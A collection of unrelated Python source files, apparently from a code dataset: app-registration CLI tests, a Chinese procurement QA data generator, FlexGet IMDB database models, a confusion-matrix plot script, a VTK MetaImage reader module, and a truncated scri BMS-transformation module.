def setUp(self):
# retrieve the selected tenant name
code, self.tname, _ = test.scloud("get", "tenant")
self.assertEqual(0, code)
self.assertIsNotNone(self.tname)
# delete apps/subscription in case a test fails in the middle
def tearDown(self):
appreg("delete-app", "scloudapptest")
appreg("delete-app", "scloudsubscription")
appreg("delete-subscription", "scloudsubscriptiontest")
appreg("delete-app", "scloudrotatesecrettest")
def test_create_get_delete_app(self):
appName = "scloudapptesting"
code, result, _ = appreg("create-app", appName, "web", "--redirect-urls", "https://redirect1.com", "--title",
"scloudapptitle")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Get-app-Tests
code, result, _ = appreg("get-app", appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# List-all-app-Tests
code, result, _ = appreg("list-apps")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Update app
code, result, _ = appreg("update-app", appName, "--redirect-urls", "https://redirect2.com , https://mycompany.com", "--title",
"scloudapptitle")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Clean up
code, result, _ = appreg("delete-app", appName)
self.assertEqual(0, code)
def test_create_get_delete_subscription(self):
appName = "scloudsubscription"
# Create-app
code, result, _ = appreg("create-app", appName, "web", "--redirect-urls", "https://redirect1.com", "--title",
appName)
# Create-subscription-Tests
code, result, _ = appreg("create-subscription", appName)
self.assertEqual(0, code)
# Get-subscription-Tests
code, result, _ = appreg("get-subscription", appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Get-subscription-of Non-exist app Tests
code, result, _ = appreg("get-subscription", "nosuchapp")
self.assertEqual(1, code)
# List-all-subscriptions-Test
code, result, _ = appreg("list-subscriptions", "web")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Clean up
code, result, _ = appreg("delete-subscription", appName)
self.assertEqual(0, code)
code, result, _ = appreg("delete-app", appName)
self.assertEqual(0, code)
def test_rotate_secret(self):
appName = "scloudrotatesecret"
code, result, _ = appreg("create-app", appName, "web", "--redirect-urls", "https://redirect1.com", "--title",
appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# rotate app secret
code, result, _ = appreg("rotate-secret", appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Clean up
code, result, _ = appreg("delete-app", appName)
self.assertEqual(0, code)
def test_get_spec_json(self):
code, result, _ = appreg("get-spec-json")
self.assertEqual(0, code)
self.assertTrue(result)
def test_get_spec_yaml(self):
code, result, _ = appreg("get-spec-yaml")
self.assertEqual(0, code)
self.assertTrue(result)
| 34.226415 | 134 | 0.599504 |
b39270499a1de4e402802dac367ca1d006653043 | 3,362 | py | Python | examples/question_answering/generate_data.py | Tufeiming/simpletransformers | d61ee86836a6c91ccb5e2fa2cd2cdeb9b0af40db | [
"Apache-2.0"
] | null | null | null | examples/question_answering/generate_data.py | Tufeiming/simpletransformers | d61ee86836a6c91ccb5e2fa2cd2cdeb9b0af40db | [
"Apache-2.0"
] | null | null | null | examples/question_answering/generate_data.py | Tufeiming/simpletransformers | d61ee86836a6c91ccb5e2fa2cd2cdeb9b0af40db | [
"Apache-2.0"
] | null | null | null | import json
def get_question(field, keyword_list, context):
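    """Return the question text for a field: defaults to the field's standard Chinese label,
    but if any of the candidate keywords appears in the context, the first matching keyword
    is used as the question instead."""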
if field == "budget_amount":
question = "预算金额"
elif field == "bid_amount":
question = "中标金额"
elif field == "party_a_name":
question = "采购人"
elif field == "party_a_contact":
question = "采购联系人"
elif field == "party_a_contact_number":
question = "采购联系电话"
elif field == "agency_name":
question = "代理机构"
elif field == "agency_contact":
question = "代理机构联系人"
elif field == "agency_contact_number":
question = "代理机构联系电话"
elif field == "party_b_name":
question = "中标人"
else:
question = ""
for keyword in keyword_list:
if keyword in context:
question = keyword
break
return question
def generate_example(input_text):
context = input_text
qas = []
    # 预算金额 (budget amount)
temp_field = "budget_amount"
temp_list = ['起拍价', '底价', '预算金额', '采购金额', '招标控制价', '投资额', '总预算', '采购预算价',
'采购资金', '最高限价', '控制价', '拦标价', '建安造价', '工程预算']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
    # 中标金额 (winning bid amount)
temp_field = "bid_amount"
temp_list = ['中标金额', '成交金额', '预中标价格', '合同金额', '合同总金额', '中标价格',
'成交价格', '采购合同金额', '签约合同价', '成交价', '成交价合计', '成交价款',
'成交商家报价', '中标商家报价', '中选金额']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
    # 甲方名称 (Party A / purchaser name)
temp_field = "party_a_name"
temp_list = ['采购单位', '招标单位', '建设单位', '采购单位名称', '招标人名称', '招标人单位名称',
'采购人', '招标人', '发包人', '采购人名称']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
    # 甲方联系人 (Party A contact person)
temp_field = "party_a_contact"
temp_list = ['采购', '招标']
temp_question = get_question(temp_field, temp_list, context) + "联系人"
qas.append({"question": temp_question, "id": temp_field})
    # 甲方联系电话 (Party A contact phone number)
temp_field = "party_a_contact_number"
temp_list = ['采购', '招标']
temp_question = get_question(temp_field, temp_list, context) + "联系电话"
qas.append({"question": temp_question, "id": temp_field})
    # 代理机构名称 (agency name)
temp_field = "agency_name"
qas.append({"question": "代理机构", "id": temp_field})
    # 代理机构联系人 (agency contact person)
temp_field = "agency_contact"
qas.append({"question": "代理机构联系人", "id": temp_field})
    # 代理机构联系电话 (agency contact phone number)
temp_field = "agency_contact_number"
qas.append({"question": "代理机构联系电话", "id": temp_field})
    # 乙方名称 (Party B / winning bidder name)
temp_field = "party_b_name"
temp_list = ['乙方', '供应商', '中标单位', '中标公司', '成交单位',
'成交公司', '承包单位', '承包公司', '中标人', '成交人', '承包人']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
return {
"qas": qas,
"context": context
}
if __name__ == '__main__':
text = "START项目名称和编号 西南财经大学智慧教室多媒体智能扩音设备采购项目(WZ201929) 采购人 西南财经大学" \
" 地址及联系方式 成都市温江区柳台大道555号028-87092439 评审小组 纪建国、钱彤、李科、胡芳、赵亮 中标商家名称 " \
"成都市创航科技有限公司 中标商家地址 成都市武侯区人民南路四段一号 中标商家报价 461800元 主要标的名称 智能扩音设备一:" \
"艾力特OS-704FC-A80台 智能扩音设备二:艾力特SPK-3E196台 智能扩音设备三:艾力特MS-D05080台;END"
data = generate_example(text)
print(json.dumps(data, ensure_ascii=False, indent=4))
| 32.960784 | 79 | 0.608269 |
e85162bc6f782a754ec6f1fc9fc5ab583c487a51 | 6,232 | py | Python | flexget/components/imdb/db.py | signe/Flexget | dfe92d03415aab8254c5cf4827e06ad13da10504 | [
"MIT"
] | null | null | null | flexget/components/imdb/db.py | signe/Flexget | dfe92d03415aab8254c5cf4827e06ad13da10504 | [
"MIT"
] | null | null | null | flexget/components/imdb/db.py | signe/Flexget | dfe92d03415aab8254c5cf4827e06ad13da10504 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from loguru import logger
from sqlalchemy import Boolean, Column, DateTime, Float, Integer, String, Table, Unicode
from sqlalchemy.orm import relation
from sqlalchemy.schema import ForeignKey, Index
from flexget import db_schema
from flexget.components.imdb.utils import extract_id
from flexget.db_schema import UpgradeImpossible
logger = logger.bind(name='imdb.db')
SCHEMA_VER = 9
Base = db_schema.versioned_base('imdb_lookup', SCHEMA_VER)
# association tables
genres_table = Table(
'imdb_movie_genres',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('genre_id', Integer, ForeignKey('imdb_genres.id')),
Index('ix_imdb_movie_genres', 'movie_id', 'genre_id'),
)
Base.register_table(genres_table)
actors_table = Table(
'imdb_movie_actors',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('actor_id', Integer, ForeignKey('imdb_actors.id')),
Index('ix_imdb_movie_actors', 'movie_id', 'actor_id'),
)
Base.register_table(actors_table)
directors_table = Table(
'imdb_movie_directors',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('director_id', Integer, ForeignKey('imdb_directors.id')),
Index('ix_imdb_movie_directors', 'movie_id', 'director_id'),
)
Base.register_table(directors_table)
writers_table = Table(
'imdb_movie_writers',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('writer_id', Integer, ForeignKey('imdb_writers.id')),
Index('ix_imdb_movie_writers', 'movie_id', 'writer_id'),
)
Base.register_table(writers_table)
class Movie(Base):
__tablename__ = 'imdb_movies'
id = Column(Integer, primary_key=True)
title = Column(Unicode)
original_title = Column(Unicode)
url = Column(String, index=True)
# many-to-many relations
genres = relation('Genre', secondary=genres_table, backref='movies')
actors = relation('Actor', secondary=actors_table, backref='movies')
directors = relation('Director', secondary=directors_table, backref='movies')
writers = relation('Writer', secondary=writers_table, backref='movies')
languages = relation('MovieLanguage', order_by='MovieLanguage.prominence')
score = Column(Float)
votes = Column(Integer)
meta_score = Column(Integer)
year = Column(Integer)
plot_outline = Column(Unicode)
mpaa_rating = Column(String, default='')
photo = Column(String)
# updated time, so we can grab new rating counts after 48 hours
# set a default, so existing data gets updated with a rating
updated = Column(DateTime)
@property
def imdb_id(self):
return extract_id(self.url)
@property
def expired(self):
"""
        :return: True if movie details are considered to be expired, i.e. in need of an update
"""
if self.updated is None:
logger.debug('updated is None: {}', self)
return True
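        # Base refresh interval of 2 days, plus 5 extra days per year of the movie's age,
        # so older titles are refreshed less frequently.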
refresh_interval = 2
if self.year:
# Make sure age is not negative
age = max((datetime.now().year - self.year), 0)
refresh_interval += age * 5
logger.debug('movie `{}` age {} expires in {} days', self.title, age, refresh_interval)
return self.updated < datetime.now() - timedelta(days=refresh_interval)
def __repr__(self):
return '<Movie(name=%s,votes=%s,year=%s)>' % (self.title, self.votes, self.year)
class MovieLanguage(Base):
__tablename__ = 'imdb_movie_languages'
movie_id = Column(Integer, ForeignKey('imdb_movies.id'), primary_key=True)
language_id = Column(Integer, ForeignKey('imdb_languages.id'), primary_key=True)
prominence = Column(Integer)
language = relation('Language')
def __init__(self, language, prominence=None):
self.language = language
self.prominence = prominence
class Language(Base):
__tablename__ = 'imdb_languages'
id = Column(Integer, primary_key=True)
name = Column(Unicode)
def __init__(self, name):
self.name = name
class Genre(Base):
__tablename__ = 'imdb_genres'
id = Column(Integer, primary_key=True)
name = Column(String)
def __init__(self, name):
self.name = name
class Actor(Base):
__tablename__ = 'imdb_actors'
id = Column(Integer, primary_key=True)
imdb_id = Column(String)
name = Column(Unicode)
def __init__(self, imdb_id, name=None):
self.imdb_id = imdb_id
self.name = name
class Director(Base):
__tablename__ = 'imdb_directors'
id = Column(Integer, primary_key=True)
imdb_id = Column(String)
name = Column(Unicode)
def __init__(self, imdb_id, name=None):
self.imdb_id = imdb_id
self.name = name
class Writer(Base):
__tablename__ = 'imdb_writers'
id = Column(Integer, primary_key=True)
imdb_id = Column(String)
name = Column(Unicode)
def __init__(self, imdb_id, name=None):
self.imdb_id = imdb_id
self.name = name
class SearchResult(Base):
__tablename__ = 'imdb_search'
id = Column(Integer, primary_key=True)
title = Column(Unicode, index=True)
url = Column(String)
fails = Column(Boolean, default=False)
queried = Column(DateTime)
@property
def imdb_id(self):
return extract_id(self.url)
def __init__(self, title, url=None):
self.title = title
self.url = url
self.queried = datetime.now()
def __repr__(self):
return '<SearchResult(title=%s,url=%s,fails=%s)>' % (self.title, self.url, self.fails)
@db_schema.upgrade('imdb_lookup')
def upgrade(ver, session):
# v5 We may have cached bad data due to imdb changes, just wipe everything. GitHub #697
# v6 The association tables were not cleared on the last upgrade, clear again. GitHub #714
# v7 Another layout change cached bad data. GitHub #729
# v8 Added writers to the DB Schema
    # v9 Added Metacritic score extraction/filtering
if ver is None or ver <= 8:
raise UpgradeImpossible(
'Resetting imdb_lookup caches because bad data may have been cached.'
)
return ver
| 29.535545 | 99 | 0.681483 |
a8d626e3a3009f41687b24ed927d4cc699be7fc6 | 3,327 | py | Python | scripts/plots/master/plot_nice_confusion_matrix.py | dslaborg/sleep-mice-tuebingen | 95208c327b06284658afe17bb3f4e95778f3f943 | [
"Apache-2.0"
] | null | null | null | scripts/plots/master/plot_nice_confusion_matrix.py | dslaborg/sleep-mice-tuebingen | 95208c327b06284658afe17bb3f4e95778f3f943 | [
"Apache-2.0"
] | null | null | null | scripts/plots/master/plot_nice_confusion_matrix.py | dslaborg/sleep-mice-tuebingen | 95208c327b06284658afe17bb3f4e95778f3f943 | [
"Apache-2.0"
] | null | null | null | from os.path import join, dirname
import numpy as np
import matplotlib.pyplot as plt
# values in confusion matrices in percent
cm_001 = np.array([[98.09, 0.32, 1.43, 0.02, 0.14, ],
[0.78, 94.20, 1.04, 3.92, 0.05, ],
[4.49, 0.52, 91.83, 2.91, 0.26, ],
[1.16, 20.23, 20.40, 58.04, 0.17, ],
[9.68, 2.15, 17.20, 0.00, 70.97, ]])
cmT_001 = np.array([[96.24, 2.81, 1.86, 0.47, 19.08, ],
[0.08, 87.49, 0.14, 8.75, 0.76, ],
[3.59, 3.69, 97.00, 49.94, 29.01, ],
[0.04, 5.92, 0.88, 40.84, 0.76, ],
[0.05, 0.10, 0.11, 0.00, 50.38, ]])
cm_001b = np.array([[97.51, 0.66, 1.50, 0.05, 0.28, ],
[0.68, 93.00, 1.78, 4.33, 0.21, ],
[5.23, 0.52, 90.75, 3.22, 0.28, ],
[0.66, 17.08, 23.55, 58.37, 0.33, ],
[6.45, 1.08, 16.13, 0.00, 76.34, ]])
cmT_001b = np.array([[95.69, 5.72, 1.96, 0.98, 30.18, ],
[0.07, 85.62, 0.25, 9.04, 2.37, ],
[4.19, 3.65, 96.66, 51.63, 24.26, ],
[0.02, 4.95, 1.03, 38.34, 1.18, ],
[0.03, 0.05, 0.11, 0.00, 42.01, ]])
cm_005b = np.array([[98.86, 0.18, 0.92, 0.00, 0.03, ],
[0.78, 95.09, 1.51, 2.61, 0.00, ],
[5.14, 0.31, 93.14, 1.36, 0.05, ],
[0.66, 19.90, 24.38, 55.06, 0.00, ],
[40.86, 2.15, 32.26, 0.00, 24.73, ]])
stages = ['Wake', 'REM', 'NREM', 'pre-REM', 'artifact']
letters = ['a', 'b', 'c', 'd', 'e', 'f']
def plot_confusion_matrix(cm, axis, labels_x=True, labels_y=True):
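    """Draw a single confusion matrix (values given as fractions) onto the given axis.
    labels_x / labels_y control whether the x- and y-axis labels are drawn, so that the
    shared axes of the subplot grid are labelled only once."""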
axis.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)
# we want to show all ticks...
axis.set(xticks=np.arange(cm.shape[1]),
yticks=np.arange(cm.shape[0]),
# ... and label them with the respective stages
xticklabels=stages, yticklabels=stages,
# title=title,
ylabel='true sleep stages' if labels_y else '',
xlabel='predicted sleep stages' if labels_x else '')
axis.set_ylim([cm.shape[0] - 0.5, -0.5])
# rotate the tick labels and set their alignment.
plt.setp(axis.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
# loop over data dimensions and create text annotations.
fmt = '.1%'
thresh = cm.max() / 2.
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
axis.text(j, i, format(cm[i, j], fmt), ha='center', va='center',
color='white' if cm[i, j] > thresh else 'black')
plt.rcParams.update({'font.size': 12})
fig, axes = plt.subplots(1, 2, sharex='all', sharey='all', figsize=(8, 5))
axes = axes.flatten()
# for i, (ax, data) in enumerate(zip(axes, [cmT_001, cm_001, cmT_001b, cm_001b])):
for i, (ax, data, letter) in enumerate(zip(axes, [cmT_001, cm_001], letters)):
data /= 100.
plot_confusion_matrix(data, ax, i <= 2, i % 2 == 0)
ax.text(0.5, 1.05, f'{letter})',
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes)
# save plots
fig.tight_layout()
plt.savefig(join(dirname(__file__), '../../..', 'results', 'plots', 'paper', 'cm_8_conv.svg'))
plt.show()
| 41.5875 | 94 | 0.500751 |
5a0c1b45cde15999d4500fef4ce5b1b91c51b6ce | 2,082 | py | Python | modules/readers/metaImageRDR.py | chrisidefix/devide | 99bfe156e710fa47ba7ae88b0ce1eef592a3a439 | [
"BSD-3-Clause"
] | 25 | 2015-08-24T16:05:14.000Z | 2020-12-09T20:07:14.000Z | modules/readers/metaImageRDR.py | chrisidefix/devide | 99bfe156e710fa47ba7ae88b0ce1eef592a3a439 | [
"BSD-3-Clause"
] | 1 | 2016-02-16T21:18:10.000Z | 2016-02-16T21:18:10.000Z | modules/readers/metaImageRDR.py | chrisidefix/devide | 99bfe156e710fa47ba7ae88b0ce1eef592a3a439 | [
"BSD-3-Clause"
] | 5 | 2016-02-16T20:05:37.000Z | 2020-01-31T11:27:39.000Z | # $Id$
from module_base import ModuleBase
from module_mixins import ScriptedConfigModuleMixin
import module_utils
import vtk
import wx
class metaImageRDR(ScriptedConfigModuleMixin, ModuleBase):
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
self._reader = vtk.vtkMetaImageReader()
module_utils.setup_vtk_object_progress(self, self._reader,
'Reading MetaImage data.')
self._config.filename = ''
configList = [
('File name:', 'filename', 'base:str', 'filebrowser',
'The name of the MetaImage file you want to load.',
{'fileMode' : wx.OPEN,
'fileMask' :
'MetaImage single file (*.mha)|*.mha|MetaImage separate header '
'(*.mhd)|*.mhd|All files (*.*)|*.*'})]
ScriptedConfigModuleMixin.__init__(
self, configList,
{'Module (self)' : self,
'vtkMetaImageReader' : self._reader})
self.sync_module_logic_with_config()
def close(self):
# we play it safe... (the graph_editor/module_manager should have
# disconnected us by now)
for input_idx in range(len(self.get_input_descriptions())):
self.set_input(input_idx, None)
# this will take care of all display thingies
ScriptedConfigModuleMixin.close(self)
ModuleBase.close(self)
# get rid of our reference
del self._reader
def get_input_descriptions(self):
return ()
def set_input(self, idx, inputStream):
raise Exception
def get_output_descriptions(self):
return ('vtkImageData',)
def get_output(self, idx):
return self._reader.GetOutput()
def logic_to_config(self):
self._config.filename = self._reader.GetFileName()
def config_to_logic(self):
self._reader.SetFileName(self._config.filename)
def execute_module(self):
self._reader.Update()
| 27.038961 | 78 | 0.605668 |
47e03dca5b82faa6612c31956bed14574a14c299 | 21,941 | py | Python | scri/asymptotic_bondi_data/transformations.py | akhairna/scri | 3b7f307d19ef303914cef2fa088ee750ef8533c2 | [
"MIT"
] | null | null | null | scri/asymptotic_bondi_data/transformations.py | akhairna/scri | 3b7f307d19ef303914cef2fa088ee750ef8533c2 | [
"MIT"
] | null | null | null | scri/asymptotic_bondi_data/transformations.py | akhairna/scri | 3b7f307d19ef303914cef2fa088ee750ef8533c2 | [
"MIT"
] | null | null | null | import math
import numpy as np
import quaternion
import spinsfast
import spherical_functions as sf
def _process_transformation_kwargs(input_ell_max, **kwargs):
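    """Parse and validate the keyword arguments accepted by `transform`.
    Combines any time/space/spacetime translation inputs into the `supertranslation` mode array,
    checks that the requested supertranslation is real, and returns the tuple
    (frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max).
    """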
original_kwargs = kwargs.copy()
# Build the supertranslation and spacetime_translation arrays
supertranslation = np.zeros((4,), dtype=complex) # For now; may be resized below
ell_max_supertranslation = 1 # For now; may be increased below
if "supertranslation" in kwargs:
supertranslation = np.array(kwargs.pop("supertranslation"), dtype=complex)
if supertranslation.dtype != "complex" and supertranslation.size > 0:
# I don't actually think this can ever happen...
raise TypeError(
"Input argument `supertranslation` should be a complex array with size>0. "
f"Got a {supertranslation.dtype} array of shape {supertranslation.shape}"
)
# Make sure the array has size at least 4, by padding with zeros
if supertranslation.size <= 4:
supertranslation = np.lib.pad(
supertranslation, (0, 4 - supertranslation.size), "constant", constant_values=(0.0,)
)
# Check that the shape is a possible array of scalar modes with complete (ell,m) data
ell_max_supertranslation = int(np.sqrt(len(supertranslation))) - 1
if (ell_max_supertranslation + 1) ** 2 != len(supertranslation):
raise ValueError(
"Input supertranslation parameter must contain modes from ell=0 up to some ell_max, "
"including\n all relevant m modes in standard order (see `spherical_functions` "
"documentation for details).\n Thus, it must be an array with length given by a "
"perfect square; its length is {len(supertranslation)}"
)
# Check that the resulting supertranslation will be real
for ell in range(ell_max_supertranslation + 1):
for m in range(ell + 1):
i_pos = sf.LM_index(ell, m, 0)
i_neg = sf.LM_index(ell, -m, 0)
a = supertranslation[i_pos]
b = supertranslation[i_neg]
if abs(a - (-1.0) ** m * b.conjugate()) > 3e-16 + 1e-15 * abs(b):
raise ValueError(
f"\nsupertranslation[{i_pos}]={a} # (ell,m)=({ell},{m})\n"
+ "supertranslation[{}]={} # (ell,m)=({},{})\n".format(i_neg, b, ell, -m)
+ "Will result in an imaginary supertranslation."
)
spacetime_translation = np.zeros((4,), dtype=float)
spacetime_translation[0] = sf.constant_from_ell_0_mode(supertranslation[0]).real
spacetime_translation[1:4] = -sf.vector_from_ell_1_modes(supertranslation[1:4]).real
if "spacetime_translation" in kwargs:
st_trans = np.array(kwargs.pop("spacetime_translation"), dtype=float)
if st_trans.shape != (4,) or st_trans.dtype != "float":
raise TypeError(
"\nInput argument `spacetime_translation` should be a float array of shape (4,).\n"
"Got a {} array of shape {}.".format(st_trans.dtype, st_trans.shape)
)
spacetime_translation = st_trans[:]
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "space_translation" in kwargs:
s_trans = np.array(kwargs.pop("space_translation"), dtype=float)
if s_trans.shape != (3,) or s_trans.dtype != "float":
raise TypeError(
"\nInput argument `space_translation` should be an array of floats of shape (3,).\n"
"Got a {} array of shape {}.".format(s_trans.dtype, s_trans.shape)
)
spacetime_translation[1:4] = s_trans[:]
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "time_translation" in kwargs:
t_trans = kwargs.pop("time_translation")
if not isinstance(t_trans, float):
raise TypeError("Input argument `time_translation` should be a single float. " f"Got {t_trans}")
spacetime_translation[0] = t_trans
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
# Decide on the number of points to use in each direction. A nontrivial supertranslation will
# introduce power in higher modes, so for best accuracy, we need to account for that. But we'll
# make it a firm requirement to have enough points to capture the original waveform, at least
output_ell_max = kwargs.pop("output_ell_max", input_ell_max)
working_ell_max = kwargs.pop("working_ell_max", 2 * input_ell_max + ell_max_supertranslation)
if working_ell_max < input_ell_max:
raise ValueError(f"working_ell_max={working_ell_max} is too small; it must be at least ell_max={input_ell_max}")
# Get the rotor for the frame rotation
frame_rotation = np.quaternion(*np.array(kwargs.pop("frame_rotation", [1, 0, 0, 0]), dtype=float))
if frame_rotation.abs() < 3e-16:
raise ValueError(f"frame_rotation={frame_rotation} should be a single unit quaternion")
frame_rotation = frame_rotation.normalized()
# Get the boost velocity vector
boost_velocity = np.array(kwargs.pop("boost_velocity", [0.0] * 3), dtype=float)
beta = np.linalg.norm(boost_velocity)
if boost_velocity.dtype != float or boost_velocity.shape != (3,) or beta >= 1.0:
raise ValueError(
f"Input boost_velocity=`{boost_velocity}` should be a 3-vector with " "magnitude strictly less than 1.0"
)
return frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max
def boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi):
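    """Construct the grid of rotors used to evaluate spin-weighted functions on the distorted grid.
    Each rotor combines the boost correction `Bprm_j_k`, the frame rotation, and the rotor for the
    spherical coordinates (θ', ϕ'), so that functions known in the original frame can be evaluated
    at the grid points of the transformed frame.
    """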
beta = np.linalg.norm(boost_velocity)
gamma = 1 / math.sqrt(1 - beta ** 2)
rapidity = math.atanh(beta)
# Construct the function that modifies our rotor grid to account for the boost
if beta > 3e-14: # Tolerance for beta; any smaller and numerical errors will have greater effect
vhat = boost_velocity / beta
def Bprm_j_k(thetaprm, phiprm):
"""Construct rotor taking r' to r
I derived this result in a different way, but I've also found it described in
Penrose-Rindler Vol. 1, around Eq. (1.3.5). Note, however, that their discussion is for
the past celestial sphere, so there's a sign difference.
"""
# Note: It doesn't matter which we use -- r' or r; all we need is the direction of the
# bivector spanned by v and r', which is the same as the direction of the bivector
# spanned by v and r, since either will be normalized, and one cross product is zero iff
# the other is zero.
rprm = np.array(
[math.cos(phiprm) * math.sin(thetaprm), math.sin(phiprm) * math.sin(thetaprm), math.cos(thetaprm)]
)
Thetaprm = math.acos(np.dot(vhat, rprm))
Theta = 2 * math.atan(math.exp(-rapidity) * math.tan(Thetaprm / 2.0))
rprm_cross_vhat = np.quaternion(0.0, *np.cross(rprm, vhat))
if rprm_cross_vhat.abs() > 1e-200:
return (rprm_cross_vhat.normalized() * (Thetaprm - Theta) / 2).exp()
else:
return quaternion.one
else:
def Bprm_j_k(thetaprm, phiprm):
return quaternion.one
# These are the angles in the transformed system at which we need to know the function values
thetaprm_phiprm = sf.theta_phi(n_theta, n_phi)
# Set up rotors that we can use to evaluate the SWSHs in the original frame
R_j_k = np.empty((n_theta, n_phi), dtype=np.quaternion)
for j in range(n_theta):
for k in range(n_phi):
thetaprm_j, phiprm_k = thetaprm_phiprm[j, k]
R_j_k[j, k] = (
Bprm_j_k(thetaprm_j, phiprm_k) * frame_rotation * quaternion.from_spherical_coords(thetaprm_j, phiprm_k)
)
return R_j_k
def conformal_factors(boost_velocity, distorted_grid_rotors):
"""Compute various combinations of the conformal factor
This is primarily a utility function for use in the `transform` function, pulled out so that it
can be tested separately.
Parameters
==========
boost_velocity: array of 3 floats
Three-velocity of the new frame relative to the old frame
distorted_grid_rotors: 2-d array of quaternions
Unit quaternions giving the rotation of the (x, y, z) basis onto the basis vectors with
respect to which the output spin-weighted fields are evaluated
Returns
=======
k: spherical_functions.Grid
ðk_over_k: spherical_functions.Grid
one_over_k: spherical_functions.Grid
one_over_k_cubed: spherical_functions.Grid
These all have the same shape as `distorted_grid_rotors` except for an additional dimension
of size 1 at the beginning, so that they can broadcast against the time dimension.
"""
from quaternion import rotate_vectors
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Note that ðk / k = ð(v·r) / (1 - v·r), but evaluating ð(v·r) is slightly delicate. As modes
# in the undistorted frame, we have ð(v·r) ~ (v·r), but the right hand side is now an s=1 field,
# so it has to be evaluated as such.
v_dot_r = sf.Grid(np.dot(rotate_vectors(distorted_grid_rotors, quaternion.z.vec), boost_velocity), spin_weight=0)[
np.newaxis, :, :
]
ðv_dot_r = sf.Grid(
sf.Modes(np.insert(sf.vector_as_ell_1_modes(boost_velocity), 0, 0.0), spin_weight=1).evaluate(
distorted_grid_rotors
),
spin_weight=1,
)[np.newaxis, :, :]
one_over_k = γ * (1 - v_dot_r)
k = 1.0 / one_over_k
ðk_over_k = ðv_dot_r / (1 - v_dot_r)
one_over_k_cubed = one_over_k ** 3
return k, ðk_over_k, one_over_k, one_over_k_cubed
def transform(self, **kwargs):
"""Apply BMS transformation to AsymptoticBondiData object
It is important to note that the input transformation parameters are applied in this order:
1. (Super)Translations
2. Rotation (about the origin)
3. Boost (about the origin)
All input parameters refer to the transformation required to take the input data's inertial
frame onto the inertial frame of the output data's inertial observers. In what follows, the
coordinates of and functions in the input inertial frame will be unprimed, while corresponding
values of the output inertial frame will be primed.
The translations (space, time, spacetime, or super) can be given in various ways, which may
override each other. Ultimately, however, they are essentially combined into a single function
`α`, representing the supertranslation, which transforms the asymptotic time variable `u` as
u'(u, θ, ϕ) = u(u, θ, ϕ) - α(θ, ϕ)
A simple time translation by δt would correspond to
α(θ, ϕ) = δt # Independent of (θ, ϕ)
A pure spatial translation δx would correspond to
α(θ, ϕ) = -δx · n̂(θ, ϕ)
where `·` is the usual dot product, and `n̂` is the unit vector in the given direction.
Parameters
==========
abd: AsymptoticBondiData
The object storing the modes of the original data, which will be transformed in this
function. This is the only required argument to this function.
time_translation: float, optional
Defaults to zero. Nonzero overrides corresponding components of `spacetime_translation` and
`supertranslation` parameters. Note that this is the actual change in the coordinate value,
rather than the corresponding mode weight (which is what `supertranslation` represents).
space_translation : float array of length 3, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`spacetime_translation` and `supertranslation` parameters. Note that this is the actual
change in the coordinate value, rather than the corresponding mode weight (which is what
`supertranslation` represents).
spacetime_translation : float array of length 4, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`supertranslation`. Note that this is the actual change in the coordinate value, rather
than the corresponding mode weight (which is what `supertranslation` represents).
supertranslation : complex array [defaults to 0]
This gives the complex components of the spherical-harmonic expansion of the
supertranslation in standard form, starting from ell=0 up to some ell_max, which may be
different from the ell_max of the input `abd` object. Supertranslations must be real, so
these values should obey the condition
α^{ℓ,m} = (-1)^m ᾱ^{ℓ,-m}
This condition is actually imposed on the input data, so imaginary parts of α(θ, ϕ) will
essentially be discarded. Defaults to empty, which causes no supertranslation. Note that
some components may be overridden by the parameters above.
frame_rotation : quaternion [defaults to 1]
Transformation applied to (x,y,z) basis of the input mode's inertial frame. For example,
the basis z vector of the new frame may be written as
z' = frame_rotation * z * frame_rotation.inverse()
Defaults to 1, corresponding to the identity transformation (no rotation).
boost_velocity : float array of length 3 [defaults to (0, 0, 0)]
This is the three-velocity vector of the new frame relative to the input frame. The norm of
this vector is required to be smaller than 1.
output_ell_max: int [defaults to abd.ell_max]
Maximum ell value in the output data.
working_ell_max: int [defaults to 2 * abd.ell_max]
Maximum ell value to use during the intermediate calculations. Rotations and time
translations do not require this to be any larger than abd.ell_max, but other
transformations will require more values of ell for accurate results. In particular, boosts
are multiplied by time, meaning that a large boost of data with large values of time will
lead to very large power in higher modes. Similarly, large (super)translations will couple
power through a lot of modes. To avoid aliasing, this value should be large, to accomodate
power in higher modes.
Returns
-------
abdprime: AsymptoticBondiData
Object representing the transformed data.
"""
from quaternion import rotate_vectors
from scipy.interpolate import CubicSpline
# Parse the input arguments, and define the basic parameters for this function
